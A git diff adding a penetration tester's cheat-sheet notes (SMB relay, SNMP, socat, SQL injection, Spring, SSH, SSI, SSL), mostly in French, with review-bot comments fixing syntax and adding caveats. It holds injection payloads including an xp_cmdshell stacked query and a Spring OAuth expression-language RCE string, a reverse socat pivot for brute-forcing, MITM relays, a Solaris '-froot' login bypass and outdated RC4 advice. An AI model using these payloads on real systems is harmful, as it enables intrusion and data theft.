+When using the mpm_prefork module, Apache does not spawn new threads, it forks new
+processes instead. This is a lot more CPU consuming (because of context
+switching) and memory-consuming as well. Thus, raising the MaxClients can be
+devastating, it could trigger oom kills and/or make the system unresponsible.
+
+* commentaire de adrian qui resume bien les trolls
+every flaw takes a long walk until one will properly make it public and eventually do some marketing around it for a small profit (or big, depends on the players - see "the john doe helping cisco/microsoft to cover dns flaw" case). the usual path is a set of exploit rediscoveries until in the hands of the "real" exploiter. it was anoctopus - guys fed up when faced with bad justice probably as i interpret your text, it was apkill - dude fed up with low-brains/high-marketing-skills antiddos businesses (see http://pub.mud.ro/~cia/computing/apache-httpd-deni ... ) and it seems slowloris is the end of the line (see http://ha.ckers.org/blog/20090617/slowloris-http-d ... )
+welcome to the real world of IT sharks :)
+
diff --git a/Cheat Sheet/smbrelay b/Cheat Sheet/smbrelay
new file mode 100644
index 0000000..f0d5bab
--- /dev/null
+++ b/Cheat Sheet/smbrelay
@@ -0,0 +1,24 @@
+# smb-relay smbrelay
+
+http://www.room362.com/blog/2014/05/21/effective-ntlm-slash-smb-relaying/
+http://www.josho.org/blog//blog/2014/06/20/snarf/ https://github.com/purpleteam/snarf # might not do http
+http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
+
+impacket/smbrelayx.py supports NTLMv2 (msf smb_relay didnt in 04/2013)
+https://github.com/byt3bl33d3r/impacket/blob/master/examples/smbrelayx.py to exec commands on remote host
+
+can't relay to DCs due to SMB signing (turned on by default on DC)
+the .exe has to be a service exe, or a mof or a normal exe in Startup
+
+smbrelay3 (http://www.tarasco.org/security/smbrelay/ http://seclists.org/fulldisclosure/2008/Nov/302)
+ SMB to SMB relay
+ HTTP to SMB relay
+ SMTP to SMB relay
+ POP3 to SMB relay
+ IMAP to SMB relay
+http://squirtle.googlecode.com/
+zackattack
+
+ldaprelay
+https://github.com/CoreSecurity/impacket/issues/139 https://github.com/CoreSecurity/impacket/pull/163 https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py#L125
+
diff --git a/Cheat Sheet/smtp b/Cheat Sheet/smtp
new file mode 100644
index 0000000..ea85c11
--- /dev/null
+++ b/Cheat Sheet/smtp
@@ -0,0 +1,8 @@
+# smtp
+
+vrfy
+expn
+
+ehlo relay.hsc.fr
+mail from:
+rcpt to:
diff --git a/Cheat Sheet/snmp b/Cheat Sheet/snmp
new file mode 100644
index 0000000..5183d99
--- /dev/null
+++ b/Cheat Sheet/snmp
@@ -0,0 +1,18 @@
+# snmp
+
+pentoo-portage-trunk/snmpenum
+onesixyone (http://labs.portcullis.co.uk/tools/onesixtyone/)
+braa
+http://www.nothink.org/codes/snmpcheck/index.php
+
+# attention
+j'ai deja eu un service snmp qui repondait en v1 avec "private" mais pas en v2
+
+# lister les users du domaine sur un DC
+snmpwalk -v1 -c public 172.10.10.100 1
+
+# lister les users dun windows
+snmpwalk -v1 -c public 1.2.3.4 1.3.6.1.4.1.77.1.2.25
+
+# lister la version/banner d'un windows ou device divers
+... 10.0.0.1 1.3.6.1.2.1.1.1.0
diff --git a/Cheat Sheet/socat b/Cheat Sheet/socat
new file mode 100644
index 0000000..df9d079
--- /dev/null
+++ b/Cheat Sheet/socat
@@ -0,0 +1,34 @@
+# socat
+
+socat TCP4-LISTEN:8080,bind=192.168.122.1,reuseaddr,fork,su=nobody,range=192.168.122.1/32 OPENSSL:1.2.3.4:443,verify=0
+stunnel -c -d 127.0.0.2:80 -r 1.2.3.4:443 # fait peut etre la meme chose, à tester
+
+reuseaddr: allows immediate restart after master process's termination, even if some child sockets are not completely shut down
+bind: bind to a specific interface
+fork: fork a new process after each accept()
+su: su to user nobody after forking
+range=192.168.0.0/24: only permits connections from a private network
+
+# monter un reseau virtuel TUN
+# ssl: http://www.dest-unreach.org/socat/doc/socat-openssltunnel.html
+root@server: socat -d -d TCP-L:11443,reuseaddr TUN:192.168.255.1/24,up
+root@client: socat -d -d TCP:192.168.0.13:11443 TUN:192.168.255.2/24,up
+
+# reutiliser la session SSL (et ne pas refaire le handshake)
+openssl s_client -connect 1.2.3.4:443 -ign_eof -quiet -sess_out ssl_session.ctx
+socat -d TCP4-L:9090,reuseaddr,fork exec:'openssl s_client -host 1.2.3.4 -port 443 -ign_eof -quiet -sess_in ssl_session.ctx' 2>/dev/null
+./wfuzz.py -c -z file -f ~/dico.txt --basic 'manager:FUZZ' --hc 401 http://127.0.0.1:9090/manager/html/
+
+# loggue les requetes HTTP et retourne une reponse HTTP statique
+socat TCP-LISTEN:80,fork,reuseaddr EXEC:'path/to/httplogger.py'
+socat openssl-listen:443,fork,reuseaddr,verify=0,cert=path/to/cert+key.pem EXEC:'path/to/httplogger.py' (verify=1 -> certificat client obligatoire)
+
+# sslmitm
+socat -v openssl-listen:8081,fork,reuseaddr,cert=cert.pem,key=key.pem,verify=0 tcp:127.0.0.1:3306
+socat -v tcp-l:3306,reuseaddr,fork openssl:1.2.3.4:443,verify=0
+/etc/init.d/dnsmasq start && less +F /tmp/dnsmasq.log
+
+# reverse socat to bf local services
+clt: socat -d tcp:mabox:1234,fork,interval=1,forever tcp:127.0.0.1:445
+moi: socat -v tcp-l:5555,reuseaddr,fork tcp-l:1234,reuseaddr
+puis bf avec 1 seul thread
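Review bot: The outbound TLS legs in this file are built with `verify=0` (the first `OPENSSL:1.2.3.4:443,verify=0` line and the `openssl:1.2.3.4:443,verify=0` side of the sslmitm pair), so the upstream certificate is never validated and anything sitting between the relay and 1.2.3.4 would go unnoticed; that is fine for a lab relay but deserves a comment at the first use, e.g. `# verify=0: upstream cert not checked; use verify=1,cafile=<ca.pem> outside a lab`. The `su=nobody` option on the same first line presumably requires socat to be started as root, which the line does not say; `# start as root, su=nobody drops privileges per child` would make that explicit. The `openssl s_client ... -sess_in` exec leg shares the same property, since no CA is passed to it either.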
diff --git a/Cheat Sheet/solaris b/Cheat Sheet/solaris
new file mode 100644
index 0000000..7dc2658
--- /dev/null
+++ b/Cheat Sheet/solaris
@@ -0,0 +1,13 @@
+# solaris
+
+# EXTREMEPARR local root Solaris 7 - 11 (x86 & SPARC)
+https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh
+
+# telnet
+telnet -l"-froot"
+
+# sfw
+/opt/sfw/bin/wget,nc,ncat,netcat
+
+# public exploits
+https://github.com/0xdea/exploits/tree/master/solaris
diff --git a/Cheat Sheet/soql b/Cheat Sheet/soql
new file mode 100644
index 0000000..61a817a
--- /dev/null
+++ b/Cheat Sheet/soql
@@ -0,0 +1,3 @@
+# soql
+
+http://corycowgill.blogspot.com.au/2011/01/sql-soql-injection.html
diff --git a/Cheat Sheet/sort b/Cheat Sheet/sort
new file mode 100644
index 0000000..4b4d53a
--- /dev/null
+++ b/Cheat Sheet/sort
@@ -0,0 +1,8 @@
+# sort
+
+# sort by popularity
+cat pass.dic | sort | uniq -c | sort -k 1nr -k 2 | sed -e 's,^ *[0-9]\+ ,,'
+
+# pure
+unset LANG
+cat rockyou-75.txt | sed -e '/[^a-zA-Z]/d' | tr '[[:upper:]]' '[[:lower:]]' | tr -cd '\12\141-\172' | cut -b -8 > rockyou.pure
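Review bot: `unset LANG` before the "# pure" pipeline does not guarantee the C locale, because `LC_ALL` or `LC_CTYPE`, when set, take precedence over `LANG` and the character classes in `sed` and `tr` would still be locale-dependent; prefixing the command with `LC_ALL=C` is the reliable form. `tr '[[:upper:]]' '[[:lower:]]'` also carries an extra pair of brackets around each class, which makes `[` and `]` map to themselves rather than being part of the class; the standard spelling is `tr '[:upper:]' '[:lower:]'`. Since the `sed -e '/[^a-zA-Z]/d'` step already drops every line containing a non-letter, the later `tr -cd '\12\141-\172'` appears redundant once the text is lowercased and could be noted as such or removed.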
diff --git a/Cheat Sheet/sourceforge b/Cheat Sheet/sourceforge
new file mode 100644
index 0000000..ed8868b
--- /dev/null
+++ b/Cheat Sheet/sourceforge
@@ -0,0 +1,3 @@
+# sourceforge
+
+http://$PROJECTNAME.svn.sourceforge.net/svnroot/$PROJECTNAME/trunk
diff --git a/Cheat Sheet/sox b/Cheat Sheet/sox
new file mode 100644
index 0000000..badd691
--- /dev/null
+++ b/Cheat Sheet/sox
@@ -0,0 +1,4 @@
+# sox
+
+export AUDIODRIVER=alsa
+play blah.[mp3|wav] trim 0.50 1.25
diff --git a/Cheat Sheet/splunk b/Cheat Sheet/splunk
new file mode 100644
index 0000000..d7a6d48
--- /dev/null
+++ b/Cheat Sheet/splunk
@@ -0,0 +1,3 @@
+# splunk
+
+default creds: admin/changeme
diff --git a/Cheat Sheet/spring b/Cheat Sheet/spring
new file mode 100644
index 0000000..2d40b2f
--- /dev/null
+++ b/Cheat Sheet/spring
@@ -0,0 +1,65 @@
+# SpringSource Spring Framework
+
+# http://en.wikipedia.org/wiki/Spring_Framework
+Spring Framework includes Spring Security (formely Acegi Security System for Spring)
+
+# all vulns
+http://support.springsource.com/security/springsource-all
+
+# mass assignment / autobinding
+http://agrrrdog.blogspot.com.au/2017/03/autobinding-vulns-and-spring-mvc.html
+
+# vulns
+* CVE-2010-1622 RCE
+http://blog.o0o.nu/2010/06/cve-2010-1622.html
+http://support.springsource.com/security/cve-2010-1622
+affected versions:
+- 3.0.0 to 3.0.2
+- 2.5.0 to 2.5.6.SEC01 (community releases)
+- 2.5.0 to 2.5.7 (subscription customers)
+- Earlier versions may also be affected
+
+* CVE-2011-2730 Info Disc
+http://support.springsource.com/security/cve-2011-2730
+fixed in 3.0.6
+
+* CVE-2011-2732
+header injection
+
+* CVE-2011-2894
+Spring Framework and Spring Security serialization-based remoting vulnerabilities
+http://support.springsource.com/security/cve-2011-2894 http://www.pwntester.com/blog/2013/12/16/cve-2011-2894-deserialization-spring-rce/
+affected version:
+- Spring Framework: 3.0.0 to 3.0.5
+- Spring Security: 3.0.0 to 3.0.5 and 2.0.0 to 2.0.6
+- Earlier, unsupported versions may also be affected
+
+* lots of vulns
+http://wouter.coekaerts.be/2011/spring-vulnerabilities
+
+* XXE (CVE-2013-4152 CVE-2013-6429 CVE-2013-7315)
+CVE-2013-4152: http://seclists.org/bugtraq/2013/Aug/154 http://www.gopivotal.com/security/cve-2013-4152 https://jira.spring.io/browse/SPR-10806
+affected versions:
+- 3.0.0 to 3.2.3 (Spring OXM & Spring MVC)
+- 4.0.0.M1 (Spring OXM)
+- 4.0.0.M1-4.0.0.M2 (Spring MVC)
+- Earlier unsupported versions may also be affected
+
+* Directory Traversal (CVE-2014-3578 and CVE-2014-3625 "incomplete fix")
+Spring Framework:
+- 3.0.4 to 3.2.11
+- 4.0.0 to 4.0.7
+- 4.1.0 to 4.1.1
+
+only exploitable if in web.xml:
+ - UrlResource
+
+GET /springapp/css/file:/etc/passwd
+
+* CVE-2016-4977 RCE in Spring Security
+http://secalert.net/#CVE-2016-4977 vuln when using Whitelabel Error Page instead of custom error page
+redirect_uri=${777-111}
+redirect_uri=${T(java.lang.Runtime).getRuntime().exec("ls")}
+affected versions:
+Pivotal Spring Security OAuth 2.0 - 2.0.9
+Pivotal Spring Security OAuth 1.0 - 1.0.5
diff --git a/Cheat Sheet/sqli b/Cheat Sheet/sqli
new file mode 100644
index 0000000..793df56
--- /dev/null
+++ b/Cheat Sheet/sqli
@@ -0,0 +1,244 @@
+# sqli
+
+# detection summary
+http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
+
+# evasion
+https://github.com/client9/libinjection/blob/master/data/sqli-rsalgado-bhusa2013.txt # good tricks
+http://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
+https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
+https://websec.files.wordpress.com/2010/11/sqli2.pdf
+
+# test sql
+http://sqlfiddle.com/
+
+# cheatsheets
+http://www.sqlinjectionwiki.com/
+http://www.websec.ca/kb/sql_injection (was https://docs.google.com/document/d/1rO_LCBKJY0puvRhPhAfTD2iNVPfR4e9KiKDpDE2enMI/edit#heading=h.7343208e65c0)
+https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
+http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
+http://pentestmonkey.net/category/cheat-sheet/sql-injection
+http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
+sqli-cheatsheets
+
+# a lot of articles on sqli
+https://delicious.com/inquis/sqlinjection
+
+# tips
+?id=1 limit 0 union select login,password from users into outfile '/tmp/users'
+outfile OR dumpfile
+concat() OR concat_ws() OR group_concat() (all lines in one line)
+always use UNION ALL in order to preserve duplicate rows
+
+select top 1 (ou 2) 0,1,table_name COLLATE DATABASE_DEFAULT,2,3...
+ ou bien essayer:
+from thetable limit 1
+
+http://websec.ca/blog/view/Bypassing_WAFs_with_SQLMap
+
+twitter: "You can use %82 on MySQL 5 as a replacement for %2C when performing SQL injections"
+
+# extract the current running query
+http://www.contextis.com/resources/blog/sql-inception-how-select-yourself/
+
+# sqli labs
+https://github.com/Audi-1/sqli-labs
+
+# detect/confirm
+MySQL: 'serv' 'ices' / concat('adm','in')
+MSSQL: 'serv'+'ices'
+Oracle: 'serv'||'ices'
+Postgres: 'serv'||'ices'
+
+# time
+* MSSQL
+a' waitfot delay '0:0:10'--
+
+# stacked
+* MSSQL
+abc';waitfor delay '0:0:10'--
+123;exec xp_cmdshell 'ping 1.1.1.1';select 1 from (select 2 login) users // SELECT * FROM users WHERE login=$input ORDER BY login ASC
+
+# sqli optimisation using Range:
+-m POST -H 'Range: bytes=-1' -i 200
+
+# web for pentester II
+select * from users where username = 'doesntexist' or 'a'='a' and password = 'nobodyusedthispw' -> ( False ) OR ( True AND False) -> 0 result
+' or 'a'='a' limit 0,1 --%20
+username=asdf\&password=+and+'a'='a -> username = 'asdf\' and password=' and 'a'='a'
+&limit=4+procedure+analyse()
+&group=id+..
+
+## fingerprint db
+* sqlmap
+[11:41:18] [PAYLOAD] 1 AND (SELECT CHR(99)&CHR(72)&CHR(108)&CHR(79) FROM MSysAccessObjects)=CHR(99)&CHR(72)&CHR(108)&CHR(79)
+[11:41:18] [PAYLOAD] 1 AND (SELECT CHR(99)||CHR(72)||CHR(108)||CHR(79) FROM SYSIBM.SYSDUMMY1)=CHR(99)||CHR(72)||CHR(108)||CHR(79)
+[11:41:18] [PAYLOAD] 1 AND (SELECT 'cHlO' FROM RDB$DATABASE)='cHlO'
+[11:41:18] [PAYLOAD] 1 AND (SELECT 'cHlO' FROM VERSIONS)='cHlO'
+[11:41:18] [PAYLOAD] 1 AND (SELECT CHAR(99)+CHAR(72)+CHAR(108)+CHAR(79))=CHAR(99)+CHAR(72)+CHAR(108)+CHAR(79)
+[11:41:18] [PAYLOAD] 1 AND (SELECT 0x63486c4f)=0x63486c4f
+[11:41:18] [PAYLOAD] 1 AND (SELECT CHR(99)||CHR(72)||CHR(108)||CHR(79) FROM DUAL)=CHR(99)||CHR(72)||CHR(108)||CHR(79)
+[11:41:18] [PAYLOAD] 1 AND (SELECT CHR(99)||CHR(72)||CHR(108)||CHR(79) FROM DUAL)=CHR(70)||CHR(114)||CHR(118)||CHR(71)
+
+* https://rdot.org/forum/showthread.php?t=118
+
+MySQL
+id=1+procedure+analyse()
+id=1+and+concat_ws(1,1)=1
+id=1+and+connection_id()=connection_id()
+
+MSSQL
+id=1+and+len(@@version)=len(@@version)
+id=1+and+(@@TEXTSIZE>@@LANGID)
+
+PostgerSQL
+id=1+and+1=1::int // Informix тоже держит такой синтаксис, но она крайне редка, так что пока оставлю
+id=1+and+pg_backend_pid()=pg_backend_pid()
+id=1+and+5432=inet_server_port()
+
+Access
+id=1+and+1=StrConv(1,1)
+id=1+and+Sgn(1)=Sgn(1)
+
+Oracle
+id=1+and+instr4(1,1,1,1)=1
+id=1+and+rownum=rownum
+
+Sybase
+id=1+and+inttohex(10)=inttohex(10) // не уверен в уникальности, вроде прошарил гугл, но не факт
+
+Interbase/Firebird (tnx Corwin)
+id=1+and+GEN_UUID()!=GEN_UUID()
+(uuid_to_char() и char_to_uuid()) // Firebird начиная с версии 2.5
+id=1+and+UUID_TO_CHAR(GEN_UUID())!=UUID_TO_CHAR(GE N_UUID())
+
+* https://rdot.org/forum/showthread.php?t=118&page=7 (more)
+
+MySQL (>=3.*)
+id=1 and concat_ws(1,1)
+id=1 and connection_id()
+id=1 and inet_aton(1)
+id=1 and password(1)
+id=1 and inet_ntoa(111111111)
+id=1 and field(1,1)
+id=1 and elt(1,1)
+id=1 and curdate()
+id=1 and find_in_set(1,1)
+id=1 and make_set(1,1)
+id=1 and export_set(1,1,1)
+
+MSSQL (>=2000)
+id=1 and CHECKSUM(1)=CHECKSUM(1)
+id=1 and QUOTENAME(1)=QUOTENAME(1)
+id=1 and APP_NAME()=APP_NAME()
+id=1 and PERMISSIONS()=PERMISSIONS()
+id=1 and ROWCOUNT_BIG()=ROWCOUNT_BIG()
+
+sqlmap/plugins/dbms/mssqlserver/fingerprint.py:
+ for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \
+ ("2005", "XACT_STATE()=XACT_STATE()"), \
+ ("2008", "SYSDATETIME()=SYSDATETIME()"), \
+ ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)")):
+
+PostgreSQL (>=7.4)
+id=1 and pg_client_encoding()=pg_client_encoding()
+id=1 and split_part(chr(1),chr(1),1)=split_part(chr(1),chr( 1),1)
+id=1 and quote_literal(chr(1))=quote_literal(chr(1))
+id=1 and quote_ident(chr(1))=quote_ident(chr(1))
+id=1 and string_to_array(chr(1),chr(1))=string_to_array(chr (1),chr(1))
+
+DB2 (>=8)
+id=1 and GRAPHIC(1)=GRAPHIC(1)
+id=1 and DOUBLE_PRECISION(1)=DOUBLE_PRECISION(1)
+id=1 and MULTIPLY_ALT(1,1)=MULTIPLY_ALT(1,1)
+id=1 and JULIAN_DAY(CURRENT_DATE)=JULIAN_DAY(CURRENT_DATE)
+id=1 and GENERATE_UNIQUE()!=GENERATE_UNIQUE()
+id=1 and MIDNIGHT_SECONDS(current_time)=MIDNIGHT_SECONDS(current_time)
+id=1 and dbclob('1')=dbclob('1')
+id=1 and blob('1')=blob('1')
+id=1 and clob('1')=clob('1')
+
+SQLite
+id=1 and last_insert_rowid() (>=2.4.7)
+id=1 and zeroblob(1)=zeroblob(1)
+id=1 and total_changes()
+id=1 and sqlite_version()
+id=1 and sqlite_compileoption_get(1)=sqlite_compileoption_get(1)
+id=1 and sqlite_compileoption_used(1)=sqlite_compileoption_ used(1)
+id=1 and sqlite_source_id()
+id=1 and changes()
+id=1 and glob(1,1)
+
+Firebird (>=2.1)
+id=1 and GEN_UUID()!=GEN_UUID()
+id=1 and BIN_SHL(1,1)=BIN_SHL(1,1)
+id=1 and BIN_SHR(1,1)=BIN_SHR(1,1)
+id=1 and ASCII_CHAR(1)=ASCII_CHAR(1)
+
+Ingres (>=9.2)
+id=1 and VARBYTE(1)=VARBYTE(1)
+id=1 and BYTEEXTRACT(1,1)=BYTEEXTRACT(1,1)
+id=1 and SQUEEZE(1)=SQUEEZE(1)
+id=1 and _TIME(1)=_TIME(1)
+id=1 and UUID_CREATE()!=UUID_CREATE()
+
+Oracle (>=8.1.5)
+id=1 and instrb(1,1)=1
+id=1 and lengthb(1)=1
+id=1 and rawtohex(1)=rawtohex(1)
+id=1 and hextoraw(1)=hextoraw(1)
+id=1 and TO_MULTI_BYTE(1)=TO_MULTI_BYTE(1)
+id=1 and TO_SINGLE_BYTE(1)=TO_SINGLE_BYTE(1)
+id=1 and SYS_GUID()!=SYS_GUID()
+id=1 and NLS_CHARSET_NAME(1)=NLS_CHARSET_NAME(1)
+
+Access (>=2003)
+id=1 and choose(1,1)
+id=1 and InstrRev(1,1)
+id=1 and StrConv(1,1)
+id=1 and Sgn(1)
+id=1 and DateSerial(1,1,1)
+id=1 and TimeSerial(1,1,1)
+id=1 and CVar(1)
+id=1 and CCur(1)
+id=1 and CInt(1)
+
+Informix (>=10)
+id=1 and DBSERVERNAME=DBSERVERNAME
+id=1 and SITENAME=SITENAME
+id=1 and MDY(1,1,1)=MDY(1,1,1)
+id=1 and ROOT(1)=ROOT(1)
+
+Sybase (>=10)
+id=1 and COUNT_SET_BITS(1)=1
+id=1 and EVENT_CONDITION_NAME(1)=EVENT_CONDITION_NAME(1)
+id=1 and LESSER(1,1)=LESSER(1,1)
+id=1 and NEXT_CONNECTION(0)=NEXT_CONNECTION(0)
+id=1 and PROPERTY_NAME(1)=PROPERTY_NAME(1)
+id=1 and TRUNCNUM(1,1)=TRUNCNUM(1,1)
+id=1 and YMD(1,1,1)=YMD(1,1,1)
+
+# types
+Authentication Bypass
+Data Extraction
+ Error based
+ Union based
+ Blind SQLi
+ DNS Exfiltration
+ Bypass WAF/Black Listing
+Advanced Exploitation
+ File read/write
+ Code execution
+Advanced Identification/Exploitation
+ Order by/group by
+ Double Encoding/decoding
+ Injection in Insert/Update
+ Other HTTP fields
+ Injection in stored procedures
+ 2nd order Injections
+ GBK encoding
+ UTF-7 decoding
+ Truncation issues
+
+# recommendations
+http://bobby-tables.com/
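Review bot: Several probes copied from the rdot.org thread carry a stray space inside an identifier from forum line-wrapping, so they will not parse as written: `GE N_UUID()` on the Interbase line, `chr( 1)` and `chr (1)` on the PostgreSQL split_part/string_to_array lines, and `sqlite_compileoption_ used(1)` on the SQLite line. In the MSSQL time section `waitfot` should read `waitfor`, as the stacked section right below already spells it, and the `PostgerSQL` heading should be `PostgreSQL`. The three Russian comments from the same thread would be clearer translated: roughly "Informix also accepts this syntax but is rare enough to ignore for now", "not sure this one is unique to Sybase", and "uuid_to_char()/char_to_uuid() exist from Firebird 2.5 on".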
diff --git a/Cheat Sheet/sqlite b/Cheat Sheet/sqlite
new file mode 100644
index 0000000..d9ea36d
--- /dev/null
+++ b/Cheat Sheet/sqlite
@@ -0,0 +1,25 @@
+# sqlite
+
+# double-quotes https://sqlite.org/lang_keywords.html
+sqlite3 web500.sqlite
+CREATE TABLE USERS(
+ ID INT PRIMARY KEY NOT NULL,
+ LOGIN TEXT NOT NULL,
+ PASSWORD TEXT NOT NULL
+);
+INSERT INTO USERS (ID, LOGIN, PASSWORD) VALUES(1, 'root', 'p@ssw0Rd!');
+sqlite> select * from users;
+1|root|p@ssw0Rd!
+sqlite> select * from users where login = 'admin' and password = 'asdfasdf';
+sqlite> select * from users where login = 'root' and password = "password";
+1|root|p@ssw0Rd!
+sqlite> ^D
+
+# rce options
+https://www.sqlite.org/lang_corefunc.html#load_extension (can have extension on an smb share)
+
+# check integrity
+sqlite3 blah.sqlite "PRAGMA integrity_check"
+
+# sqli
+union select sql from sqlite_master where type = 'table' -- -
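Review bot: The double-quote demo lacks the one-line explanation of why `password = "password"` matches with a wrong password: SQLite resolves a double-quoted token as an identifier first, so `"password"` becomes the PASSWORD column and the predicate is `password = password`, true for every row; only when no such column exists does it fall back to a string literal (the legacy behaviour the linked keyword page describes). Worth adding a mitigation line next to it: since SQLite 3.29.0 the fallback can be disabled with the `SQLITE_DQS=0` compile-time option or at runtime via `SQLITE_DBCONFIG_DQS_DML`/`SQLITE_DBCONFIG_DQS_DDL` (`.dbconfig dqs_dml off` in the shell). The general fix for the pattern in the demo remains bound parameters instead of string-built SQL.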
diff --git a/Cheat Sheet/sqlmap b/Cheat Sheet/sqlmap
new file mode 100644
index 0000000..c4d8e9d
--- /dev/null
+++ b/Cheat Sheet/sqlmap
@@ -0,0 +1,4 @@
+# sqlmap
+
+python p0wnpr0xy.py -t 'example.com' -c '~/tools/scan/sqlmap/svn/sqlmap.py -u {url} --cookie {cookies} --proxy=http://127.0.0.1:8082'
+python ... -c 'wget --spider --force-html -r -e robots=off http://www.example.com'
diff --git a/Cheat Sheet/squid b/Cheat Sheet/squid
new file mode 100644
index 0000000..ce017b0
--- /dev/null
+++ b/Cheat Sheet/squid
@@ -0,0 +1,7 @@
+# squid
+
+# Via
+affiche la version du squid
+
+# X-Forwarded-For
+affiche login du client
diff --git a/Cheat Sheet/ssh b/Cheat Sheet/ssh
new file mode 100644
index 0000000..98dd15f
--- /dev/null
+++ b/Cheat Sheet/ssh
@@ -0,0 +1,58 @@
+# ssh
+
+# weak dh
+http://blog.gdssecurity.com/labs/2015/8/3/ssh-weak-diffie-hellman-group-identification-tool.html
+
+# best ciphers
+https://stribika.github.io/2015/01/04/secure-secure-shell.html
+https://wiki.mozilla.org/Security/Guidelines/OpenSSH#Configuration
+
+# batch mode, no pw prompt
+ssh -o BatchMode=yes -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@$i id
+
+# only one prompt
+-o NumberOfPasswordPrompts=1
+
+# only forward socks4
+ssh -nNT -D1234
+
+# environment
+http://www.opennet.ru/base/netsoft/1025195882_355.txt.html
+
+# "no who, no IP logged" (seen in phrack)
+ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i
+
+# perf
+When you're pumping a lot of data over an SSH connection, it pays to tweak your ciphers. Blowfish and "arcfour" (RC4) are good contenders.
+scp -c blowfish myfile ryu@localhost:
+
+# output pubkey from private rsa key
+$ chmod 600 ./id_rsa
+$ ssh-keygen -y -f ./id_rsa
+ssh-rsa AAAAB3NzaC
+
+# ssh v1
+sshtrix
+
+# extract rsa keys from ssh-agent (https://www.netspi.com/blog/entryid/235/stealing-unencrypted-ssh-agent-keys-from-memory)
+https://github.com/NetSPI/sshkey-grab
+
+# chroot breakout / jail escape
+https://github.com/earthquake/chw00t
+http://pentestmonkey.net/blog/chroot-breakout-perl
+http://www.bpfh.net/simes/computing/chroot-break.html
+http://www.opennet.ru/base/netsoft/1025195882_355.txt.html
+
+# time based user enum
+http://www.0xdeadbeef.info/ CVE-2003-0190 and CVE-2006-5229 and tools sshtime
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-5229
+regularily “rediscovered” http://seclists.org/fulldisclosure/2013/Jul/88
+http://pentestmonkey.net/tools/timing-attack-checker (variant with pubkey)
+
+# hijack
+http://0xthem.blogspot.fr/2015/03/hijacking-ssh-to-inject-port-forwards.html
+https://github.com/seastorm/PuttyRider
+
+# bruteforcing hashed known_hosts
+oclHashcat -m 160 -a 1 hash.txt ips-left.txt ips-right.txt --hex-salt
+hashcat -a 3 -m 160 hash.txt ipv4.hcmask --hex-salt # wget 'http://pastebin.com/raw.php?i=4HQ6C8gG' -O ipv4.hcmask
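Review bot: The perf tip (`scp -c blowfish` and the recommendation of arcfour/RC4) contradicts the hardening references cited under "best ciphers" a few lines above, and modern OpenSSH no longer offers either cipher by default (both were disabled and later removed during the 7.x series). For throughput today the AEAD suites are the right suggestion, so I'd replace that line with `scp -c aes128-gcm@openssh.com myfile ryu@localhost:` (or `chacha20-poly1305@openssh.com`). A short caveat on the batch-mode line would also help: `-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null` turns off host-key verification entirely, so any host reached that way is exposed to MITM and credentials sent over it should be treated as disclosed.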
diff --git a/Cheat Sheet/ssi b/Cheat Sheet/ssi
new file mode 100644
index 0000000..86b2f1b
--- /dev/null
+++ b/Cheat Sheet/ssi
@@ -0,0 +1,19 @@
+# Server Side Include (SSI)
+
+default extensions: .shtml, .stm, .shtm
+also server might configured to only parse SSI if .shtml is executable (option XBitblah)
+
+
+
+ # relative to webroot, cannot contain ..
+ # relative to the directory containing the current document being parsed
+
+
+* read OS environment variable
+if osenv(bitcoin)
+set
+echo
+
+* rce
+define PERL5OPT= debug
+then re-read page with virtual=
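Review bot: The example directives were lost in extraction, so the two indented comments (`relative to webroot, cannot contain ..` and `relative to the directory containing the current document`) no longer say which include attribute they describe; I'd rewrite them as explicit lines, e.g. `#include virtual="/path" -- URL-path, resolved by the server as if requested` and `#include file="name" -- relative to the current document's directory, cannot contain ../ or be absolute`. Per Apache mod_include the `../` restriction belongs to `file=`, not `virtual=`, so the first comment appears to have the two swapped — worth checking against the original note. The `option XBitblah` reference is the Apache `XBitHack` directive (parse SSI only in files with the owner-execute bit set), which is the name a reader will need to grep for in httpd.conf.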
diff --git a/Cheat Sheet/ssl b/Cheat Sheet/ssl
new file mode 100644
index 0000000..c2bfcee
--- /dev/null
+++ b/Cheat Sheet/ssl
@@ -0,0 +1,116 @@
+# ssl
+
+https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
+http://blog.ivanristic.com/downloads/SSL_Threat_Model.png
+
+# manual testing
+http://www.contextis.com/resources/blog/manually-testing-ssltls-weaknesses/
+http://www.exploresecurity.com/wp-content/uploads/custom/SSL_manual_cheatsheet.html
+
+# insecure reneg (2009), BEAST (2011), CRIME (2012), Lucky 13, RC4, TIME, BREACH (2013)
+http://googleonlinesecurity.blogspot.com.au/2013/11/a-roster-of-tls-cipher-suites-weaknesses.html
+beast: cbc ciphers affected, we should prefer rc4 instead
+crime, breach: compression
+rc4: attacks still not practical (requires ~7TB of data over 3 months)
+tls1.0: rc4 preferred, then cbc ciphers accepted
+tls1.1+: cbc ciphers preferred, then rc4 cipher accepted
+
+# timeline
+https://www.feistyduck.com/ssl-tls-and-pki-timeline/
+
+# check cert verification on client implementation
+https://github.com/yymax/x509test
+
+# basicContraints
+https://www.trustwave.com/spiderlabs/advisories/TWSL2011-007.txt
+
+# to read
+http://commandlinefanatic.com/cgi-bin/showarticle.cgi?article=art027
+https://wiki.thc.org/ssl
+
+# cipher list
+http://op-co.de/blog/posts/android_ssl_downgrade/
+
+# breach
+http://breachattack.com/resources/BREACH%20-%20BH%202013%20-%20PRESENTATION.pdf
+
+# audit thick clients' ssl checking
+www.gremwell.com/sslcaudit
+
+# ssl v2
+http://www.unspecific.com/ssl/
+http://carnal0wnage.attackresearch.com/node/397
+
+# tester
+sslyze --regular www.blah.com
+https://www.ssllabs.com/ssldb/
+https://testssl.sh
+
+# post sur FD
+Attached is one of the null-prefix certificates [2] that he distributed during
